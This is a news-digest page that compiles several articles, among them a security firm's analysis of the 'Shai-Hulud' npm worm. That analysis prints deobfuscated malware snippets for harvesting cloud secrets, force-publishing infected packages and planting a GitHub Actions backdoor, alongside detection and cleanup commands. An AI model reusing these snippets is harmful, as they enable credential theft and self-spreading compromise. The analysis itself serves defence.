10 interesting stories served every morning and every evening.
Slack is extorting us with a $195k/yr bill increase
An open letter, or something
For nearly 11 years, Hack Club - a nonprofit that provides coding education and community to teenagers worldwide - has used Slack as the tool for communication. We weren’t freeloaders. A few years ago, when Slack transitioned us from their free nonprofit plan to a $5,000/year arrangement, we happily paid. It was reasonable, and we valued the service they provided to our community.
However, two days ago, Slack reached out to us and said that if we don’t agree to pay an extra $50k this week and $200k a year, they’ll deactivate our Slack workspace and delete all of our message history.
One could argue that Slack is free to stop providing us the nonprofit offer at any time, but in my opinion, a six month grace period is the bare minimum for a massive hike like this, if not more. Essentially, Salesforce (a $230 billion company) is strong-arming a small nonprofit for teens, by providing less than a week to pony up a pretty massive sum of money, or risk cutting off all our communications. That’s absurd.
The small amount of notice has also been catastrophic for the programs that we run. Dozens of our staff and volunteers are now scrambling to update systems, rebuild integrations and migrate years of institutional knowledge. The opportunity cost of this forced migration is simply staggering.
Anyway, we’re moving to Mattermost. This experience has taught us that owning your data is incredibly important, and if you’re a small business especially, then I’d advise you move away too.
This post was rushed out because, well, this has been a shock! If you’d like any additional details then feel free to send me an email.
...
Read the original on skyfall.dev »
The UN’s top investigative body on Palestine and Israel ruled on Tuesday that Israel is guilty of the crime of genocide in Gaza, in the most authoritative pronouncement to date.
The 72-page report by the UN commission of inquiry on Palestine and Israel finds Israel has committed four of the five acts prohibited under the 1948 Genocide Convention, and that Israeli leaders had the intent to destroy Palestinians in Gaza as a group.
The finding echoes reports by Palestinian, Israeli and international rights groups that have reached the same conclusion over the past year.
But this is the first comprehensive legal probe by a UN body, serving as an indicator of a judgment by the International Court of Justice (ICJ), which is currently hearing a case by South Africa accusing Israel of genocide. The ICJ case is expected to take several years to be concluded.
“For the finding on Israel’s responsibility for its conduct in Gaza, the commission used the legal standard set forth by the International Court of Justice. This is therefore the most authoritative finding emanating from the United Nations to date,” Navi Pillay, the commission’s chair, told Middle East Eye.
“Reports generated by the United Nations, including by a commission of inquiry, bear particular probative value and can be relied upon by all domestic and international courts.”
Pillay, a prominent jurist who previously served as the UN’s high commissioner for human rights and the President of the International Criminal Tribunal for Rwanda, said all states had an unequivocal legal obligation to prevent the genocide in Gaza. She also urged the UK government to review its stance on the Gaza genocide, including its refusal to label it as such.
“The obligation to prevent genocide arises when states learn of the existence of a serious risk of genocide and thus states, including the UK, must act without the need to wait for a judicial determination to prevent genocide,” she said.
Another member of the commission, Chris Sidoti, told MEE that states must act now to prevent genocide. “There is no excuse now for not acting,” he said.
“The UN report will remain the most authoritative statement until the International Court of Justice completes and rules on the genocide case brought against Israel.”
The report is due to be presented to the UN General Assembly in October.
It calls on UN member states to take several measures, including halting arms transfers to Israel and imposing sanctions against Israel and individuals or corporations that are involved in or facilitating genocide or incitement to commit the crime.
The report concluded that Israel has committed genocide against Palestinians in Gaza since 7 October 2023, covering the period from that date until 31 July 2025.
It said that Israel has committed four acts of genocide:
Killing members of the group: Palestinians were killed in large numbers through direct attacks on civilians, protected persons, and vital civilian infrastructure, as well as by the deliberate creation of conditions that led to death.
Causing serious bodily or mental harm: Palestinians suffered torture, rape, sexual assault, forced displacement, and severe mistreatment in detention, alongside widespread attacks on civilians and the environment.
Inflicting conditions of life calculated to destroy the group: Israel deliberately imposed inhumane living conditions in Gaza, including destruction of essential infrastructure, denial of medical care, forced displacement, blocking of food, water, fuel, and electricity, reproductive violence, and starvation as a method of warfare. Children were found to be particularly targeted.
Preventing births within the group: The attack on Gaza’s largest fertility clinic destroyed thousands of embryos, sperm samples, and eggs. Experts told the commission this would prevent thousands of Palestinian children from ever being born.
In addition to the genocidal acts, the investigation concluded that the Israeli authorities and security forces have the genocidal intent to destroy, in whole or in part, the Palestinians in the Gaza Strip.
Genocidal intent is often the hardest to prove in any genocide case. But the authors of the report have found “fully conclusive evidence” of such intent.
They cited statements made by Israeli authorities, including President Isaac Herzog, Prime Minister Benjamin Netanyahu and Yoav Gallant - who served as defence minister for much of the war - as direct evidence of genocidal intent.
It also found that the three leaders have committed the crime of incitement to genocide, a substantive crime under Article III of the convention, regardless of whether genocide was committed.
Additionally, on the basis of circumstantial evidence, the commission found that genocidal intent was the “only reasonable inference” that could be drawn based on the pattern of conduct of the Israeli authorities. That is the same standard of proof that will be used by the ICJ in its current proceedings against Israel.
The commission said it identified six patterns of conduct by Israeli forces in Gaza that support an inference of genocidal intent:
Mass killings: Israeli forces have killed and seriously harmed an unprecedented number of Palestinians since 7 October 2023, mostly civilians, using heavy munitions in densely populated areas. By 15 July 2025, 83 percent of those killed were civilians, the report found. Nearly half were women and children.
Cultural destruction: The systematic leveling of homes, schools, mosques, churches, and cultural sites was cited as evidence of an effort to erase Palestinian identity.
Deliberate suffering: Despite three provisional orders from the ICJ and repeated international warnings, Israel continued policies knowing Palestinians were trapped and unable to flee, the commission said.
Collapse of healthcare: Israeli forces targeted Gaza’s healthcare system, attacking hospitals, killing and abusing medical personnel, and blocking vital supplies and patient evacuations.
Sexual violence: Investigators documented sexualised torture, rape, and other forms of gender-based violence, describing them as tools of collective punishment.
Targeting children: Children were shot by snipers and drones, including during evacuations and at shelters, with some killed while carrying white flags.
“Israeli political and military leaders are agents of the State of Israel; therefore, their acts are attributable to the State of Israel,” the report read.
“The State of Israel bears responsibility for the failure to prevent genocide, the commission of genocide and the failure to punish genocide against the Palestinians in the Gaza Strip.”
The three-member commission of inquiry was established in May 2021 by the Geneva-based UN Human Rights Council (HRC) with a permanent mandate to investigate international humanitarian and human rights law violations in occupied Palestine and Israel from April 2021.
The commission is mandated to report annually to the HRC and the UN General Assembly. Its members are independent experts, unpaid by the UN, on an open-ended mandate.
The commission’s reports are highly authoritative and are widely cited by international legal bodies, including the ICJ and the International Criminal Court in The Hague.
Over the past four years, it has produced some of the most groundbreaking reports on international law breaches in Israel and Palestine.
Since 7 October 2023, the commission has issued three reports and three papers on international law breaches by different parties.
Previous reports have concluded that Israeli forces have committed crimes against humanity and war crimes in Gaza, including, among others, extermination, torture, rape, sexual violence and starvation as a method of warfare. They also concluded that two acts of genocide had been committed in Gaza.
Its three members are eminent human rights and legal experts.
Pillay served as UN high commissioner for human rights from 2008 to 2014. She previously served as a judge at the International Criminal Court and presided over the UN’s ad hoc tribunal for Rwanda.
Miloon Kothari served as the first UN special rapporteur on adequate housing between 2000 and 2008, while Sidoti is the former Australian human rights commissioner and previously served as a member of the UN Independent International Fact-Finding Mission on Myanmar from 2017 to 2019.
...
Read the original on www.middleeasteye.net »
This article is NOT served from a web server running on a disposable vape. If you want to see the real deal, click here. The content is otherwise identical.
For a couple of years now, I have been collecting disposable vapes from friends and family. Initially, I only salvaged the batteries for “future” projects (It’s not hoarding, I promise), but recently, disposable vapes have gotten more advanced. I wouldn’t want to be the lawyer who one day will have to argue how a device with USB C and a rechargeable battery can be classified as “disposable”. Thankfully, I don’t plan on pursuing law anytime soon.
Last year, I was tearing apart some of these fancier pacifiers for adults when something caught my eye: instead of the expected black blob of goo hiding some ASIC (Application Specific Integrated Circuit), I saw a little integrated circuit inscribed “PUYA”. I don’t blame you if this name doesn’t excite you as much as it does me; most people have never heard of them. They are best known for their flash chips, but I first came across them after reading Jay Carlson’s blog post about the cheapest flash microcontroller you can buy. They are quite capable little ARM Cortex-M0+ micros.
Over the past year I have collected quite a few of these PY32 based vapes, all of them from different models of vape from the same manufacturer. It’s not my place to do free advertising for big tobacco, so I won’t mention the brand I got it from, but if anyone who worked on designing them reads this, thanks for labeling the debug pins!
The chip is marked PUYA C642F15, which wasn’t very helpful. I was pretty sure it was a PY32F002A, but after poking around with pyOCD, I noticed that the flash was 24k and we have 3k of RAM. The extra flash meant that it was more likely a PY32F002B, which is actually a very different chip.
So here are the specs of a microcontroller so bad, it’s basically disposable:
* an ARM Cortex-M0+ core
* 24k of flash
* 3k of RAM
* a few peripherals, none of which we will use.
You may look at those specs and think that it’s not much to work with. I don’t blame you: a 10-year-old phone can barely load Google, and this is about 100x slower. I, on the other hand, see a blazingly fast web server.
The idea of hosting a web server on a vape didn’t come to me instantly. In fact, I have been playing around with them for a while, but after writing my post on semihosting, the penny dropped.
If you don’t feel like reading that article, semihosting is basically syscalls for embedded ARM microcontrollers. You throw some values/pointers into some registers and call a breakpoint instruction. An attached debugger interprets the values in the registers and performs certain actions. Most people just use this to get some logs printed from the microcontroller, but they are actually bi-directional.
If you are older than me, you might remember a time before Wi-Fi and Ethernet, the dark ages, when you had to use dial-up modems to get online. You might also know that the ghosts of those modems still linger all around us. Almost all USB serial devices actually emulate those modems: a 56k modem is just a 57600 baud serial device. Data between some of these modems was transmitted using a protocol called SLIP (Serial Line Internet Protocol).
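SLIP framing itself is tiny: packets are delimited by an END byte (0xC0), and any END or ESC (0xDB) bytes inside the payload get escaped. Here is a rough sketch of the idea in Python (my own illustration of RFC 1055, not code from this project):

END, ESC, ESC_END, ESC_ESC = 0xC0, 0xDB, 0xDC, 0xDD

def slip_encode(packet: bytes) -> bytes:
    out = bytearray([END])                      # leading END flushes any line noise
    for b in packet:
        if b == END:
            out += bytes([ESC, ESC_END])        # escape END bytes in the payload
        elif b == ESC:
            out += bytes([ESC, ESC_ESC])        # escape ESC bytes in the payload
        else:
            out.append(b)
    out.append(END)                             # trailing END terminates the frame
    return bytes(out)

def slip_decode(stream: bytes):
    packet, escaped = bytearray(), False
    for b in stream:
        if escaped:
            packet.append(END if b == ESC_END else ESC if b == ESC_ESC else b)
            escaped = False
        elif b == ESC:
            escaped = True
        elif b == END:
            if packet:                          # ignore empty frames between packets
                yield bytes(packet)
                packet = bytearray()
        else:
            packet.append(b)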
This may not come as a surprise, but Linux (and with some tweaking even macOS) supports SLIP. The slattach utility can make any /dev/tty* send and receive IP packets. All we have to do is put the data down the wire in the right format and provide a virtual tty. This is actually easier than you might imagine: pyOCD can forward all semihosting through a telnet port, and socat can then link that port to a virtual tty.
Ok, so we have a “modem”, but that’s hardly a web server. To actually talk TCP/IP, we need an IP stack. There are many choices, but I went with uIP because it’s pretty small, doesn’t require an RTOS, and it’s easy to port to other platforms. It also, helpfully, comes with a very minimal HTTP server example.
After porting the SLIP code to use semihosting, I had a working web server…half of the time. As with most highly optimised libraries, uIP was designed for 8 and 16-bit machines, which rarely have memory alignment requirements. On ARM however, if you dereference a u16 *, you had better hope that address is even, or you’ll get an exception. uip_chksum assumed u16 alignment, but the script that creates the filesystem didn’t guarantee it. I decided to modify the structure of the filesystem a bit to make it more portable. This was my first time working with Perl and I have to say, it’s quite well suited to this kind of task.
So how fast is a web server running on a disposable microcontroller? Well, initially, not very fast. Pings took ~1.5s with 50% packet loss and a simple page took over 20s to load. That’s so bad, it’s actually funny, and I kind of wanted to leave it there.
However, the problem was actually between the seat and the steering wheel the whole time. The first implementation read and wrote a single character at a time, which had a massive overhead associated with it. I previously benchmarked semihosting on this device and was getting ~20KiB/s, but uIP’s SLIP implementation was designed for very low memory devices, so it was serialising the data byte by byte. We have a whopping 3KiB of RAM to play with, so I added a ring buffer to cache reads from the host and feed them into the SLIP poll function. I also split writes into batches to allow for escaping.
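The ring buffer itself is nothing exotic; the sketch below shows the idea in Python (the real implementation is C on the microcontroller, and the buffer sizes are the knobs mentioned below):

class RingBuffer:
    # Fixed-size FIFO: semihosting reads are pushed in bulk, the SLIP poll pops one byte at a time
    def __init__(self, size: int):
        self.buf = bytearray(size)
        self.size = size
        self.head = 0      # next write index
        self.tail = 0      # next read index
        self.count = 0     # bytes currently buffered

    def push(self, data: bytes) -> int:
        written = 0
        for b in data:
            if self.count == self.size:
                break                            # full: caller retries the rest later
            self.buf[self.head] = b
            self.head = (self.head + 1) % self.size
            self.count += 1
            written += 1
        return written

    def pop(self):
        if self.count == 0:
            return None                          # empty: nothing for the SLIP poll
        b = self.buf[self.tail]
        self.tail = (self.tail + 1) % self.size
        self.count -= 1
        return b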
Now this is what I call blazingly fast! Pings now take 20ms with no packet loss, and a full page loads in about 160ms. This was using almost all of the RAM, but I could also dial down the buffer sizes to leave more than enough headroom to run other tasks. The project repo has everything set to a nice balance of latency and RAM usage:
Memory region Used Size Region Size %age Used
FLASH: 5116 B 24 KB 20.82%
RAM: 1380 B 3 KB 44.92%
For this blog however, I paid for none of the RAM, so I’ll use all of the RAM.
As you may have noticed, we have just under 20kiB (80%) of storage space. That may not be enough to ship all of React, but as you can see, it’s more than enough to host this entire blog post. And this is not just a static page server, you can run any server-side code you want, if you know C that is.
Just for fun, I added a JSON API endpoint to get the number of requests to the main page (since the last crash) and the unique ID of the microcontroller.
...
Read the original on bogdanthegeek.github.io »
The Apple Photos app sometimes corrupts images when importing from my camera. I just wanted to make a blog post about it in case anyone else runs into the problem. I’ve seen other references to this online, but most of the people gave up trying to fix it, and none of them went as far as I did to debug the issue.
I’ll try to describe the problem, and the things I’ve tried to do to fix it. But also note that I’ve (sort of) given up on the Photos app too. Since I can’t trust it to import photos from my camera, I switched to a different workflow.
Here is a screenshot of a corrupted image in the Photos app.
I’ve got an OM System OM-1 camera. I used to shoot in RAW + jpg, then when I would import to Photos app, I would check the “delete photos after import” checkbox in order to empty the SD card. Turns out “delete after import” was a huge mistake.
I’m pretty sure I’d been getting corrupted images for a while, but it would only be 1 or 2 images out of thousands, so I thought nothing of it (it was probably my fault anyway, right?)
But the problem really got me upset when last year I went to a family member’s wedding and took tons of photos. Apple Photos combines RAW + jpg photos so you don’t have a bunch of duplicates, and when you view the images in the photos app, it just shows you the jpg version by default. After I imported all of the wedding photos I noticed some of them were corrupted. Upon closer inspection, I found that it sometimes had corrupted the jpg, sometimes corrupted the RAW file, and sometimes both. Since I had been checking the “delete after import” box, I didn’t know if the images on the SD card were corrupted before importing or not. After all, the files had been deleted so there was no way to check.
I estimate I completely lost about 30% of the images I took that day.
Losing so many photos really rattled me, but I wanted to figure out the problem so I didn’t lose images in the future.
I was worried this was somehow a hardware problem. Copying files seems so basic, I didn’t think there was any way a massively deployed app like Photos could fuck it up (especially since its main job is managing photo files). So, to narrow down the issue I changed out all of the hardware. Here are all the things I did:
* Bought a new SD card direct from the manufacturer (to eliminate the possibility of buying a bootleg SD card)
* Switched to only shooting in RAW (if importing messes up 30% of my images, but I cut the number of images I import by half, then that should be fewer corrupted images right? lol)
* Bought a new camera body (the OM-1 MKii)
I did each of these steps over time, so as to only change one variable at a time, and still the image corruption persisted. I didn’t really want to buy a new camera, the MKii is not really a big improvement over the OM-1, but we had a family trip coming up and the idea that pressing the shutter button on the camera might not actually record the image didn’t sit well with me.
Since I had replaced literally all of the hardware involved, I knew it must be a software problem. I stopped checking the “delete after import” button, and started reviewing all of the photos after import. After verifying none of them were corrupt, then I would format the SD card. I did this for months without finding any corrupt files. At this point I figured it was somehow a race condition or something when copying the photo files and deleting them at the same time.
However, after I got home from RailsConf and imported my photos, I found one corrupt image (the one above). I was able to verify that the image was not corrupt on the SD card, so the camera was working fine (meaning I probably didn’t need to buy a new camera body at all).
I tried deleting the corrupt file and re-importing the original to see if it was something about that particular image, but it re-imported just fine. In other words, it seems like the Photos app will corrupt files randomly.
I don’t know if this is a problem that is specific to OM System cameras, and I’m not particularly interested in investing in a new camera system just to find out.
If I compare the corrupted image with the non-corrupted image, the file sizes are exactly the same, but the bytes are different:
aaron@tc ~/Downloads> md5sum P7110136-from-camera.ORF Exports/P7110136.ORF
17ce895fd809a43bad1fe8832c811848 P7110136-from-camera.ORF
828a33005f6b71aea16d9c2f2991a997 Exports/P7110136.ORF
aaron@tc ~/Downloads> ls -al P7110136-from-camera.ORF Exports/P7110136.ORF
-rw-------@ 1 aaron staff 18673943 Jul 12 04:38 Exports/P7110136.ORF
-rwx------ 1 aaron staff 18673943 Jul 17 09:29 P7110136-from-camera.ORF*
The P7110136-from-camera.ORF is the non-corrupted file, and Exports/P7110136.ORF is the corrupted file from Photos app. Here’s a screenshot of the preview of the non-corrupted photo.
Here is the binary diff between the files. I ran both files through xxd then diffed them. Also if anyone cares to look, I’ve posted the RAW files here on GitHub.
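If you want to reproduce the comparison without xxd, a few lines of Python will report where the two files differ (the file names are the ones above; the script itself is mine, not from the post):

def diff_offsets(path_a, path_b, limit=20):
    # Read both files fully and report the offsets where their bytes differ
    with open(path_a, "rb") as fa, open(path_b, "rb") as fb:
        a, b = fa.read(), fb.read()
    if len(a) != len(b):
        print(f"sizes differ: {len(a)} vs {len(b)} bytes")
    diffs = [i for i in range(min(len(a), len(b))) if a[i] != b[i]]
    print(f"{len(diffs)} differing bytes")
    for i in diffs[:limit]:                       # only show the first few offsets
        print(f"offset {i:#010x}: {a[i]:02x} -> {b[i]:02x}")

diff_offsets("P7110136-from-camera.ORF", "Exports/P7110136.ORF")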
I’m not going to put any more effort into debugging this problem, but I wanted to blog about it in case anyone else is seeing the issue. I take a lot of photos, and to be frank, most of them are not very good. I don’t want to look through a bunch of bad photos every time I look at my library, so culling photos is important. Culling photos in the Photos app is way too cumbersome, so I’ve switched to using Darktable. My new workflow is to:
* Delete the ones I don’t like
* Process ones I do like
* Export both the jpg and the original raw file
* Import those to the Photos app so they’re easy to view and share
I’ve not seen any file corruption when importing to Darktable, so I am convinced this is a problem with the Photos app. But now, since all of my images land in Darktable before making their way to the Photos app, I don’t really care anymore. The bad news is that I’ve spent a lot of time and money trying to debug this. I guess the good news is that now I have redundant hardware!
...
Read the original on tenderlovemaking.com »
The popular @ctrl/tinycolor package with over 2 million weekly downloads has been compromised alongside 40+ other NPM packages in a sophisticated supply chain attack dubbed “Shai-Hulud”. The malware self-propagates across maintainer packages, harvests AWS/GCP/Azure credentials using TruffleHog, and establishes persistence through GitHub Actions backdoors - representing a major escalation in NPM ecosystem threats.

The NPM ecosystem is facing another critical supply chain attack. The popular @ctrl/tinycolor package, which receives over 2 million weekly downloads, has been compromised along with more than 40 other packages across multiple maintainers. This attack demonstrates a concerning evolution in supply chain threats - the malware includes a self-propagating mechanism that automatically infects downstream packages, creating a cascading compromise across the ecosystem. The compromised versions have been removed from npm.

In this post, we’ll dive deep into the payload’s mechanics, including deobfuscated code snippets, API call traces, and diagrams to illustrate the attack chain. Our analysis reveals a Webpack-bundled script (bundle.js) that leverages Node.js modules for reconnaissance, harvesting, and propagation, targeting Linux/macOS devs with access to NPM/GitHub/cloud creds.

To help the community respond to this incident, StepSecurity hosted a Community Office Hour on September 16th at 1 PM PT. The recording is available here: https://www.youtube.com/watch?v=D9jXoT1rtaQ

The attack unfolds through a sophisticated multi-stage chain that leverages Node.js’s process.env for opportunistic credential access and employs Webpack-bundled modules for modularity. At the core of this attack is a ~3.6MB minified bundle.js file, which executes asynchronously during npm install. This execution is likely triggered via a hijacked postinstall script embedded in the compromised package.json.

The malware includes a self-propagation mechanism through the NpmModule.updatePackage function. This function queries the NPM registry API to fetch up to 20 packages owned by the maintainer, then force-publishes patches to these packages. This creates a cascading compromise effect, recursively injecting the malicious bundle into dependent ecosystems across the NPM registry.

The malware repurposes open-source tools like TruffleHog to scan the filesystem for high-entropy secrets. It searches for patterns such as AWS keys using regular expressions like AKIA[0-9A-Z]{16}. Additionally, the malware dumps the entire process.env, capturing transient tokens such as GITHUB_TOKEN and AWS_ACCESS_KEY_ID.

For cloud-specific operations, the malware enumerates AWS Secrets Manager using SDK pagination and accesses Google Cloud Platform secrets via the @google-cloud/secret-manager API. In short, it targets cloud and developer credentials wherever it can find them: AWS, GCP, and Azure credentials, along with GitHub and NPM tokens.

The malware establishes persistence by injecting a GitHub Actions workflow file (.github/workflows/shai-hulud-workflow.yml) via a base64-encoded bash script. This workflow triggers on push events and exfiltrates repository secrets using the expression ${{ toJSON(secrets) }} to a command and control endpoint. The malware creates branches by force-merging from the default branch (refs/heads/shai-hulud) using GitHub’s /git/refs endpoint.

The malware aggregates harvested credentials into a JSON payload, which is pretty-printed for readability.
It then uploads this data to a new public repository named Shai-Hulud via the GitHub /user/repos API.

The entire attack design assumes Linux or macOS execution environments, checking for os.platform() === 'linux' || 'darwin'. It deliberately skips Windows systems.

The compromise begins with a sophisticated minified JavaScript bundle injected into affected packages like @ctrl/tinycolor. This is not rudimentary malware but rather a sophisticated modular engine that uses Webpack chunks to organize OS utilities, cloud SDKs, and API wrappers. The payload imports six core modules, each serving a specific function in the attack chain.

The first module calls getSystemInfo() to build a comprehensive system profile containing platform, architecture, platformRaw, and archRaw information. It dumps the entire process.env, capturing sensitive environment variables including AWS_ACCESS_KEY_ID, GITHUB_TOKEN, and other credentials that may be present in the environment.

The AWS harvesting module validates credentials using the STS AssumeRoleWithWebIdentityCommand. It then enumerates secrets using the @aws-sdk/client-secrets-manager library.

// Deobfuscated AWS harvest snippet
async getAllSecretValues() {
  const secrets = [];
  let nextToken;
  do {
    const resp = await client.send(new ListSecretsCommand({ NextToken: nextToken }));
    for (const secret of resp.SecretList || []) {
      const value = await client.send(new GetSecretValueCommand({ SecretId: secret.ARN }));
      secrets.push({ ARN: secret.ARN, SecretString: value.SecretString, SecretBinary: atob(value.SecretBinary) }); // Base64 decode binaries
    }
    nextToken = resp.NextToken;
  } while (nextToken);
  return secrets;
}

The module handles errors such as DecryptionFailure or ResourceNotFoundException silently through decorateServiceException wrappers. It targets all AWS regions via endpoint resolution.

The GCP module uses @google-cloud/secret-manager to list secrets matching the pattern projects/*/secrets/*. It implements pagination using nextPageToken and returns objects containing the secret name and decoded payload. The module fails silently on PERMISSION_DENIED errors without alerting the user.

The filesystem-scanning module spawns TruffleHog via child_process.exec('trufflehog filesystem / --json') to scan the entire filesystem. It parses the output for high-entropy matches, such as AWS keys found in ~/.aws/credentials.

The NPM propagation module parses NPM_TOKEN from either ~/.npmrc or environment variables. After validating the token via the /whoami endpoint, it queries /v1/search?text=maintainer:${username}&size=20 to retrieve packages owned by the maintainer.

// Deobfuscated NPM update snippet
async updatePackage(pkg) {
// Patch package.json (add self as dep?) and publish
  await exec(`npm version patch --force && npm publish --access public --token ${token}`);
}

This creates a cascading effect where an infected package leads to compromised maintainer credentials, which in turn infects all other packages maintained by that user.

The GitHub backdoor module authenticates via the /user endpoint, requiring repo and workflow scopes. After listing organizations, it injects malicious code via a bash script (Module 941). Here is the line-by-line bash script deconstruction:

# Deobfuscated Code snippet
#!/bin/bash
GITHUB_TOKEN="$1"
BRANCH_NAME="shai-hulud"
FILE_NAME=".github/workflows/shai-hulud-workflow.yml"
FILE_CONTENT=$(cat <<EOF
…
EOF
)

This workflow is executed as soon as the compromised package creates a commit with it, which immediately exfiltrates all the secrets.

The malware builds a comprehensive JSON payload containing system information, environment variables, and data from all modules. It then creates a public repository via the GitHub /repos POST endpoint using the function makeRepo('Shai-Hulud'). The repository is public by default to ensure easy access for the command and control infrastructure.

We are observing hundreds of such public repositories containing exfiltrated credentials. A GitHub search for “Shai-Hulud” repositories reveals the ongoing and widespread nature of this attack, with new repositories being created as more systems execute the compromised packages.

This exfiltration technique is similar to the Nx supply chain attack we analyzed previously, where attackers also used public GitHub repositories to exfiltrate stolen credentials. This pattern of using GitHub as an exfiltration endpoint appears to be a preferred method for supply chain attackers, as it blends in with normal developer activity and bypasses many traditional security controls.

These repositories contain sensitive information. The public nature of these repositories means that any attacker can access and potentially misuse these credentials, creating a secondary risk beyond the initial compromise.

The attack employs several evasion techniques, including silent error handling (swallowed via catch {} blocks), no logging output, and disguising TruffleHog execution as a legitimate “security scan.”

We analyzed the malicious payload using StepSecurity Harden-Runner in a GitHub Actions workflow. Harden-Runner successfully flagged the suspicious behavior as anomalous. The public insights from this test reveal how the payload works: the compromised package made unauthorized API calls to api.github.com during the npm install process, and these API interactions were flagged as anomalous since legitimate package installations should not be making such external API calls. These runtime detections confirm the sophisticated nature of the attack, with the malware attempting credential harvesting, self-propagation to other packages, and data exfiltration - all during what appears to be a routine package installation.

The following indicators can help identify systems affected by this attack:

GitHub search queries can identify potentially compromised repositories across your organization: replace ACME with your GitHub organization name and search for all instances of shai-hulud-workflow.yml in your GitHub environment.

To find malicious branches, you can use the following Bash script:

# List all repos and check for shai-hulud branch
gh repo list YOUR_ORG_NAME --limit 1000 --json nameWithOwner --jq '.[].nameWithOwner' | while read repo; do
  gh api "repos/$repo/branches" --jq '.[] | select(.name == "shai-hulud") | "'$repo' has branch: " + .name'
done

The malicious bundle.js file has a SHA-256 hash of 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09.

More than 40 packages have been confirmed as compromised; the full list is in the original post. If you use any of the affected packages, take these actions immediately:

# Check for affected packages in your project
npm ls @ctrl/tinycolor
# Remove compromised packages
npm uninstall @ctrl/tinycolor
# Search for the known malicious bundle.js by hash
find . -type f -name "*.js" -exec sha256sum {} \; | grep "46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09"
# Check for and remove the backdoor workflow
rm -f .github/workflows/shai-hulud-workflow.yml
# Look for suspicious ‘shai-hulud’ branches in all repositories
git ls-remote --heads origin | grep shai-hulud
# Delete any malicious branches found
git push origin --delete shai-hulud

The malware harvests credentials from multiple sources. Rotate ALL of the following:
* NPM tokens
* GitHub personal access tokens
* AWS access keys and GCP service account credentials
* Any credentials stored in AWS Secrets Manager or GCP Secret Manager

Since the malware specifically targets AWS Secrets Manager and GCP Secret Manager, you need to audit your cloud infrastructure for unauthorized access. The malware uses API calls to enumerate and exfiltrate secrets, so reviewing audit logs is critical to understanding the scope of compromise.

Start by examining your CloudTrail logs for any suspicious secret access patterns. Look specifically for BatchGetSecretValue, ListSecrets, and GetSecretValue API calls that occurred during the time window when the compromised package may have been installed. Also generate and review IAM credential reports to identify any unusual authentication patterns or newly created access keys.

# Check CloudTrail for suspicious secret access
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=BatchGetSecretValue
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=ListSecrets
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue
# Review IAM credential reports for unusual activity
aws iam get-credential-report --query 'Content'

For Google Cloud Platform, review your audit logs for any access to the Secret Manager service. The malware uses the @google-cloud/secret-manager library to enumerate secrets, so look for unusual patterns of secret access. Additionally, check for any unauthorized service account key creation, as these could be used for persistent access.

# Review secret manager access logs
gcloud logging read "resource.type=secretmanager.googleapis.com" --limit=50 --format=json
# Check for unauthorized service account key creation
gcloud logging read "protoPayload.methodName=google.iam.admin.v1.CreateServiceAccountKey"

* Check deploy keys and repository secrets for all projects
* Set up alerts for any new npm publishes from your organization

The following steps are applicable only for StepSecurity enterprise customers. If you are not an existing enterprise customer, you can start our 14 day free trial by installing the StepSecurity GitHub App to complete the following recovery step.

The NPM Cooldown check automatically fails a pull request if it introduces an npm package version that was released within the organization’s configured cooldown period (default: 2 days). Once the cooldown period has passed, the check will clear automatically with no action required. The rationale is simple - most supply chain attacks are detected within the first 24 hours of a malicious package release, and the projects that get compromised are often the ones that rushed to adopt the version immediately. By introducing a short waiting period before allowing new dependencies, teams can reduce their exposure to fresh attacks while still keeping their dependencies up to date.
Here is an example showing how this check protected a project from using the compromised versions of packages involved in this incident. We have added a new control specifically to detect pull requests that upgraded to these compromised packages. You can find the new control on the StepSecurity dashboard.

Use StepSecurity Harden-Runner to detect compromised dependencies in CI/CD. StepSecurity Harden-Runner adds runtime security monitoring to your GitHub Actions workflows, providing visibility into network calls, file system changes, and process executions during CI/CD runs. Harden-Runner detects these compromised packages when they are used in CI/CD, and a sample Harden-Runner insights page demonstrates this detection. If you’re already using Harden-Runner, we strongly recommend you review recent anomaly detections in your Harden-Runner dashboard. You can get started with Harden-Runner by following the guide at https://docs.stepsecurity.io/harden-runner.

The StepSecurity Threat Center provides comprehensive details about this @ctrl/tinycolor compromise and all 40+ affected packages. Access the Threat Center through your dashboard to view IOCs, remediation guidance, and real-time updates as new compromised packages are discovered. Threat alerts are automatically delivered to your SIEM via AWS S3 and webhook integrations, enabling immediate incident response when supply chain attacks occur. Our detection systems identified this attack within minutes of publication, providing early warning before widespread exploitation.

Use StepSecurity Artifact Monitor to detect software releases outside of authorized pipelines. StepSecurity Artifact Monitor provides real-time detection of unauthorized package releases by continuously monitoring your artifacts across package registries. This tool would have flagged this incident by detecting that the compromised versions were published outside of the project’s authorized CI/CD pipeline. The monitor tracks release patterns, verifies provenance, and alerts teams when packages are published through unusual channels or from unexpected locations. By implementing Artifact Monitor, organizations can catch supply chain compromises within minutes rather than hours or days, significantly reducing the window of exposure to malicious packages. Learn more about implementing Artifact Monitor in your security workflow at https://docs.stepsecurity.io/artifact-monitor.

Thanks to the npm security team and package maintainers for their swift response to this incident, and to @franky47, who promptly notified the community through a GitHub issue. The collaborative efforts of security researchers, maintainers, and community members continue to be essential in defending against supply chain attacks.
...
Read the original on www.stepsecurity.io »
Three years ago, version 2.0 of the Wasm standard was (essentially) finished, which brought a number of new features, such as vector instructions, bulk memory operations, multiple return values, and simple reference types.
In the meantime, the Wasm W3C Community Group and Working Group have not been lazy. Today, we are happy to announce the release of Wasm 3.0 as the new “live” standard.
This is a substantially larger update: several big features, some of which have been in the making for six or eight years, finally made it over the finishing line.
64-bit address space. Memories and tables can now be declared to use i64 as their address type instead of just i32. That expands the available address space of Wasm applications from 4 gigabytes to (theoretically) 16 exabytes, to the extent that physical hardware allows. While the web will necessarily keep enforcing certain limits — on the web, a 64-bit memory is limited to 16 gigabytes — the new flexibility is especially interesting for non-web ecosystems using Wasm, as they can support much, much larger applications and data sets now.
Multiple memories. Contrary to popular belief, Wasm applications were always able to use multiple memory objects — and hence multiple address spaces — simultaneously. However, previously that was only possible by declaring and accessing each of them in separate modules. This gap has been closed, a single module can now declare (define or import) multiple memories and directly access them, including directly copying data between them. This finally allows tools like wasm-merge, which perform “static linking” on two or more Wasm modules by merging them into one, to work for all Wasm modules. It also paves the way for new uses of separate address spaces, e.g., for security (separating private data), for buffering, or for instrumentation.
